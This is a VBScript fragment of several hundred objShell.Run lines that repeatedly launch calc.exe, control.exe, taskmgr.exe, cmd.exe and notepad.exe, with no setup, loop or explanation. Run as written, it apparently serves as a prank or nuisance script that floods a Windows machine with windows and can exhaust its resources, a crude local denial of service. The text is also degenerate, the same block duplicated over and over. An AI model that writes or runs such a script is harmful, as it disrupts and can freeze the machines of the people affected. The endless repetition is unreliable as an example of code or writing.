
objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
